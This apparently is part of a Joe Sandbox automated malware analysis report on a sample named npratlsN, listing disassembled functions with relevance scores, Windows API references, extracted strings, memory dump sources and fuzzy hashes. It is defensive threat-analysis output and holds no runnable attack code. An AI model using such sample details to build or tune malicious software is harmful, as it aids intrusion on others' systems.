Instruction Fuzzy Hash: 5D41CE70E00618CBEB18DFAAD84479EBBF2BF89304F10D16AD418BB254EB359946CF54

Function 2F74ECC8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8`[., xrefs: 2F74ED7C

Memory Dump Source

Source File: 0000000A.00000002.3475145213.000000002F740000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f740000_npratlsN.jbxd

Similarity

API ID:
String ID: 8`[.
API String ID: 0-3650440482
Opcode ID: 025a7efaf8fef8325946fd5a069f208b290ebf3c44d4e1e3ae82f64c1005ccd1
Instruction ID: 15b143c19d4ee98afa29855cc49c80d493753770e33f77e3d2b7166481a0793c
Opcode Fuzzy Hash: 025a7efaf8fef8325946fd5a069f208b290ebf3c44d4e1e3ae82f64c1005ccd1
Instruction Fuzzy Hash: 8F31E270E002588BDB08CFAAD8406DEFBF2BF89300F10D06AD818BB294EB345946CF55

Function 2E5CF0C9 Relevance: .7, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a92d6d2aa6b63a4638f1c08b86d4d86ab093a37a1a0b3525cfc25d10ffc1c1
Instruction ID: 4151e9c803e15d59aefac0efd1c551349f569b0704580b5ba7e4b7f96d2f3f57
Opcode Fuzzy Hash: e7a92d6d2aa6b63a4638f1c08b86d4d86ab093a37a1a0b3525cfc25d10ffc1c1
Instruction Fuzzy Hash: 3972DE74E152288FDB24CF6AC994BD9BBF2BB59304F10A1E9E508A7351DB349E81CF50

Function 2F68178B Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3474779962.000000002F680000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f680000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0ed1bcfc9d24425bad511c55860b6d8e293d189c8a4807207881265bc081af
Instruction ID: d8b40744c17b88ae95ef2d88bc216dbd57c9ad29cff9a8b04f299d25b8b49139
Opcode Fuzzy Hash: ce0ed1bcfc9d24425bad511c55860b6d8e293d189c8a4807207881265bc081af
Instruction Fuzzy Hash: 0691E2B0D00208CFEB14DFA8C984BDCBBB1FF49314F209269E509AB292DB759985CF14

Function 2E5CD490 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77766539cbb9e01c85598e669c3803cbd8c2f0b5a24811862de52db2849286a5
Instruction ID: 4a064027030cbbd4228054c5a6d374981681fdf26c988c498501bc155e2bfdb2
Opcode Fuzzy Hash: 77766539cbb9e01c85598e669c3803cbd8c2f0b5a24811862de52db2849286a5
Instruction Fuzzy Hash: A451A674E00208DFDB08DFAAD594A9DBBF6EF89300F209429E815AB364DB759945CF50

Function 2E5CD481 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489cea5e5fc5eac789327232f20823aa94c2ac7e9bdf97ca77d57e11b7f947b0
Instruction ID: fe9cc210b6ce73a79bbc0e76fe878087c0ea30772420170515fbc1ec99ba40b7
Opcode Fuzzy Hash: 489cea5e5fc5eac789327232f20823aa94c2ac7e9bdf97ca77d57e11b7f947b0
Instruction Fuzzy Hash: 2551A774E00208DFDB08DFAAD594A9DBBF2EF89300F209429E815BB365DB759945CF10

Function 2E5C7320 Relevance: 31.9, Strings: 25, Instructions: 694
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^O., xrefs: 2E5C74C9
^O., xrefs: 2E5C76F1
^O., xrefs: 2E5C73FA
^O., xrefs: 2E5C73A1
^O., xrefs: 2E5C7736
^O., xrefs: 2E5C750E
^O., xrefs: 2E5C76AC
^O., xrefs: 2E5C777B
@[., xrefs: 2E5C7A76
^O., xrefs: 2E5C7667
^O., xrefs: 2E5C734B
([., xrefs: 2E5C7454
^O., xrefs: 2E5C743F
^O., xrefs: 2E5C7798
^O., xrefs: 2E5C7484
$^q, xrefs: 2E5C7E44
^O., xrefs: 2E5C7365
^O., xrefs: 2E5C73BE
~O., xrefs: 2E5C7339
^O., xrefs: 2E5C7553
^O., xrefs: 2E5C7622
4[., xrefs: 2E5C75F2
$^q, xrefs: 2E5C7E67
^O., xrefs: 2E5C75DD
^O., xrefs: 2E5C7598

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: ([.$4[.$@[.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$^O.$~O.$$^q$$^q
API String ID: 0-273781334
Opcode ID: 988c9f3007706718e7a3257c1e96523d1bf52f4fa0d54513b42b6bfaaa10aec0
Instruction ID: f8a1e9ccd6ec0fe14c7e5664ad9c1d2d2c34a92c451a2626721fbcfc8402a348
Opcode Fuzzy Hash: 988c9f3007706718e7a3257c1e96523d1bf52f4fa0d54513b42b6bfaaa10aec0
Instruction Fuzzy Hash: 1D522474A10218CFEB149BA4C8A0B9EBBB6FF54340F1495AEC00AAB365CF359D85DF51

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Function 2E5C6581 Relevance: 10.5, Strings: 8, Instructions: 456
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 2E5C6679
(o^q, xrefs: 2E5C6742
(o^q, xrefs: 2E5C66A5
(o^q, xrefs: 2E5C6A8F
,bq, xrefs: 2E5C6A30
(o^q, xrefs: 2E5C6A9F
(o^q, xrefs: 2E5C65BE
,bq, xrefs: 2E5C6A20

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 7bef4bf856de51e8559b03ecc2f59a1e2b183eb69e58b3b24a674db855c54654
Instruction ID: e75362be0ccbf9b7488a8c8951e7207d153aca9130d8a898f27b9824853525e9
Opcode Fuzzy Hash: 7bef4bf856de51e8559b03ecc2f59a1e2b183eb69e58b3b24a674db855c54654
Instruction Fuzzy Hash: 99128930A20208DFCB04CFA9C9A4AAEBBF1BF58714F109569E509DB2A1D770EE45CB51

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 2F76BAC3 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2F76BB46
GetCurrentThread.KERNEL32 ref: 2F76BB83
GetCurrentProcess.KERNEL32 ref: 2F76BBC0
GetCurrentThreadId.KERNEL32 ref: 2F76BC19

Memory Dump Source

Source File: 0000000A.00000002.3475224957.000000002F760000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f760000_npratlsN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d911dd01fb2211e4d651bddd2f7195b98c60fbc3e7ce870b302f2137d62450f4
Instruction ID: a2cfe4e9644ec36cf38a84f514bdc20c6b71cc2dd5b69ba67aa3bb5ecd2666a5
Opcode Fuzzy Hash: d911dd01fb2211e4d651bddd2f7195b98c60fbc3e7ce870b302f2137d62450f4
Instruction Fuzzy Hash: 225156B0900609CFDB04CFAAD588BDEBBF1AF89310F20852AD459A7360DB34A945CF65

Function 2F76BAC8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2F76BB46
GetCurrentThread.KERNEL32 ref: 2F76BB83
GetCurrentProcess.KERNEL32 ref: 2F76BBC0
GetCurrentThreadId.KERNEL32 ref: 2F76BC19

Memory Dump Source

Source File: 0000000A.00000002.3475224957.000000002F760000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f760000_npratlsN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 83cdd2b264e65ea7a554c0c405f1bc4cc10048d2db76d6d833523e9141d9e2fa
Instruction ID: 89cb4c7174cc56d18e6f77c43cc1c09d4a2406cec38b24ce055784333a46ab63
Opcode Fuzzy Hash: 83cdd2b264e65ea7a554c0c405f1bc4cc10048d2db76d6d833523e9141d9e2fa
Instruction Fuzzy Hash: 295158B0900609CFDB04CFAAD588BDEBBF1AF89310F20C52AD449A7360DB34A945CF65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3432275183.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.3432275183.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 2E5CE398 Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

@>[., xrefs: 2E5CE5AA
@>[., xrefs: 2E5CE573
@>[., xrefs: 2E5CE45C

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: @>[.$@>[.$@>[.
API String ID: 0-3836779936
Opcode ID: 792d66d15bac48864c458bae3dd4484b12bafd5c9acef85e2bc75b1d460d191a
Instruction ID: 08a23790bc6c8a7c08e1587f3a239fa473e7f867c278ed93ff041ebcea02d94c
Opcode Fuzzy Hash: 792d66d15bac48864c458bae3dd4484b12bafd5c9acef85e2bc75b1d460d191a
Instruction Fuzzy Hash: 66611574D10218DFDB14DFA5C994AADBBB2FF88304F208529D809BB358DB759A46CF41

Function 2E5C7F18 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

4'^q, xrefs: 2E5C7F67
4'^q, xrefs: 2E5C7F41

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 18948edd81dcf2f0bf2863b8bb27ffc916fb61bd3572610ed2cabdb5f043b4db
Instruction ID: e2a35feba7a749357448b251520a249f6ebe6c8b4a758fe1c098a20e74ad1300
Opcode Fuzzy Hash: 18948edd81dcf2f0bf2863b8bb27ffc916fb61bd3572610ed2cabdb5f043b4db
Instruction Fuzzy Hash: 71B170303249018FD7059BA9C978B3A3BD6EFA9740F1554AAE115CF3A1EA7DEC42C781

Function 2E5C4DB0 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

Hbq, xrefs: 2E5C4E9B
Hbq, xrefs: 2E5C4ECE

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: bbe20291402a89c109e25fd0c83012f5742e8874f13331eef42ce2d19b14941f
Instruction ID: 0bdd8fc7876f124741bf222b7f61beda61c7486d40bddf2111b1240746000cc5
Opcode Fuzzy Hash: bbe20291402a89c109e25fd0c83012f5742e8874f13331eef42ce2d19b14941f
Instruction Fuzzy Hash: BDA1DE307142409FDB059FA9C8A4E6E7BE2FF98301F159869E906CB395DB38DD42C792

Function 2F75DCD0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

LR^q, xrefs: 2F75DE19
LR^q, xrefs: 2F75DCEC

Memory Dump Source

Source File: 0000000A.00000002.3475191781.000000002F750000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f750000_npratlsN.jbxd

Similarity

API ID:
String ID: LR^q$LR^q
API String ID: 0-4089051495
Opcode ID: fadbeeef24922b13a4e32ed86f05d1e9a4f524334e4bcb36298547608be3142e
Instruction ID: 0d057e5f34d3b730aae332173fafefd2ac831fa18fa841e442a6a4a5dc4bd9bc
Opcode Fuzzy Hash: fadbeeef24922b13a4e32ed86f05d1e9a4f524334e4bcb36298547608be3142e
Instruction Fuzzy Hash: 8E81A134B141158FCB08DF79C89496E77F6FF89604B1181A9E90ADB3A6DB70EC02CB95

Function 2E5C5310 Relevance: 2.7, Strings: 2, Instructions: 240COMMON

Download Yara Rule

Strings

,bq, xrefs: 2E5C53F0
,bq, xrefs: 2E5C53E6

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 8ab07ed980f2752c9a1b2ff638f666d5b33107c7e92845dd8da95950ce021650
Instruction ID: 71494e4467268f8f120c084827a963d7cf1d6d2ac1ac7f5041efd483b7d7057a
Opcode Fuzzy Hash: 8ab07ed980f2752c9a1b2ff638f666d5b33107c7e92845dd8da95950ce021650
Instruction Fuzzy Hash: 4891E134B20505CFCB04CFE9C8A49AEB7F6FF99214B24A569E505DB365DB31E842CB90

Function 2F697520 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

(bq, xrefs: 2F6976FA
(&^q, xrefs: 2F69763B

Memory Dump Source

Source File: 0000000A.00000002.3474836989.000000002F690000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f690000_npratlsN.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: e711f697a532979f0c7653327eb6014fe406e9de35dccb43180798d5e5d67cec
Instruction ID: dce21fef0b237d18bf24471c30167e3ab6897f48adcc69711403a097ef1685ac
Opcode Fuzzy Hash: e711f697a532979f0c7653327eb6014fe406e9de35dccb43180798d5e5d67cec
Instruction Fuzzy Hash: 98717D31F102199BDB05DFB9C850AAEBBF2EF88740F148529E405AB380DF34AD46CB95

Function 2E5C8AC0 Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

4'^q, xrefs: 2E5C8C14
4'^q, xrefs: 2E5C8BFD

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 829ff36f6fbd49c3e98dcf4f0cfe5e538ad8da65713902565b4701491687facb
Instruction ID: c717dffdf5ec7c28c81a5aee29d524ce679c3e7d4037f7a62662ed86ed34f34b
Opcode Fuzzy Hash: 829ff36f6fbd49c3e98dcf4f0cfe5e538ad8da65713902565b4701491687facb
Instruction Fuzzy Hash: A851D3707102049FD704DFA9C864B6ABBE6EF88314F14D466EA08CB356DB79ED41CB91

Function 2E5C9D49 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

(o^q, xrefs: 2E5C9F09
(o^q, xrefs: 2E5C9D5D

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: (o^q$(o^q
API String ID: 0-1946778100
Opcode ID: f009dc238248cb9c17cb6023625095b861850f3f807ce04bb8059d6b9dc691d0
Instruction ID: b78a8efd2a74e2ec1e77794e88c772b9db5fa1d4d84bea9f22dde7a67226f3eb
Opcode Fuzzy Hash: f009dc238248cb9c17cb6023625095b861850f3f807ce04bb8059d6b9dc691d0
Instruction Fuzzy Hash: F141A2317142449FC7059BB9C864AAEBBF6BFC8710F14846AE916DB395CE35DC06C790

Function 2E5C2F20 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xbq, xrefs: 2E5C2F56
Xbq, xrefs: 2E5C2F2D

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: f5f3bec3bd8412a0f79b66e524845675406e2617bae5564f7a5892c99920d480
Instruction ID: 61c2f2d12aa7fbc900a32e019b5f08dce69c5c6fae1fc7144b752c5d864e88db
Opcode Fuzzy Hash: f5f3bec3bd8412a0f79b66e524845675406e2617bae5564f7a5892c99920d480
Instruction Fuzzy Hash: E8318D3A72461D8BDB0C4AFA45B123EA2EAEBD9700F10843DE90AD3394DBB4CC4183D0

Function 2E5C0006 Relevance: 1.8, Strings: 1, Instructions: 570COMMON

Download Yara Rule

Strings

LR^q, xrefs: 2E5C02C3

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 40bfe60c87eb07273df8d1f8b2343fc0f1bf3894f35328b04d6908ada0bdabf0
Instruction ID: 7631f80c60b0812fa67167d69019c3f08d6b070c70a48877dc94316451e8601a
Opcode Fuzzy Hash: 40bfe60c87eb07273df8d1f8b2343fc0f1bf3894f35328b04d6908ada0bdabf0
Instruction Fuzzy Hash: ED621A34A00619CFCB54DF68D984A9DBBB2FF48304F00C1A9D41AA7364DB74AE86CF90

Function 2E5C0040 Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

LR^q, xrefs: 2E5C02C3

Memory Dump Source

Source File: 0000000A.00000002.3473791553.000000002E5C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E5C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e5c0000_npratlsN.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 833bdc0c0805f7df2913c8ee7ba922c841e9a70a5c300f0a2413d8d8e03b313f
Instruction ID: e81e44c19612124ab2cfa715bc1a925d8614c027d3344ab22a554ccd0404ab72
Opcode Fuzzy Hash: 833bdc0c0805f7df2913c8ee7ba922c841e9a70a5c300f0a2413d8d8e03b313f
Instruction Fuzzy Hash: AC52EA74A00619CFCB54DF64D984A9DBBB2FF48304F1081A9D41AA7364DB74AE86CF94

Function 2FE24419 Relevance: 1.7, APIs: 1, Instructions: 239COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 2FE246AA

Memory Dump Source

Source File: 0000000A.00000002.3475770930.000000002FE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 2FE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2fe20000_npratlsN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f90a8d08a6cb415b02d077903e65d301aa6db220e2800f4d0207f5fbeff2f032
Instruction ID: 996c7a202578b5dc9e30b1c6816bae020fceae1bfe7204a2cacebc2b0875260d
Opcode Fuzzy Hash: f90a8d08a6cb415b02d077903e65d301aa6db220e2800f4d0207f5fbeff2f032
Instruction Fuzzy Hash: 82913570A00B499FDB25CF69D580B9ABBF1BF48304F00892AD48AE7751E735E946CF90

Function 2FE26B84 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2FE26D51

Memory Dump Source

Source File: 0000000A.00000002.3475770930.000000002FE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 2FE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2fe20000_npratlsN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4b36976a1270a32fcd025cbf06ecf3229e0ddec107e9426a8b0d1231be7a90e7
Instruction ID: 786d4464e719aca17bd086b1572f94f6507c764edc97716c8ec544d58f8e7ec8
Opcode Fuzzy Hash: 4b36976a1270a32fcd025cbf06ecf3229e0ddec107e9426a8b0d1231be7a90e7
Instruction Fuzzy Hash: 10716AB4D00218DFDB21DFA9D980ADDBBF1BB09304F1491AAE558A7221D730AA85CF55

Function 2FE26B90 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2FE26D51

Memory Dump Source

Source File: 0000000A.00000002.3475770930.000000002FE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 2FE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2fe20000_npratlsN.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e383e0517328c7be066933585bced8a1129d9761ab2b19e6845abe1e1c341da2
Instruction ID: 37deb56ed90ba4e2f3ad6f72afc52c88e1e4264a8c82ed80cd51ae94c7b1e492
Opcode Fuzzy Hash: e383e0517328c7be066933585bced8a1129d9761ab2b19e6845abe1e1c341da2
Instruction Fuzzy Hash: 51717AB4D00218DFDF21DFA9D980BDDBBF1BB09304F1091AAE558A7221D730AA85CF45

Function 2F76BD08 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2F76BDDB

Memory Dump Source

Source File: 0000000A.00000002.3475224957.000000002F760000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f760000_npratlsN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5dd9522322398f22b33a563a04830b8b5fda433ef528d73c9201245d9c3acfaf
Instruction ID: 98493b20cee1cc79c6c948ed14c1e816dd752f752d097df6f14190db549f9785
Opcode Fuzzy Hash: 5dd9522322398f22b33a563a04830b8b5fda433ef528d73c9201245d9c3acfaf
Instruction Fuzzy Hash: 474146B9D002589FCB10CFA9D984ADEBBF5BB19310F14906AE918BB310D335A945CF94

Function 2F76BD10 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2F76BDDB

Memory Dump Source

Source File: 0000000A.00000002.3475224957.000000002F760000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2f760000_npratlsN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 34cdff715aa5c630bc61a282f135ca35ec2a0bb58ee22e25511efa8cd44c7cce
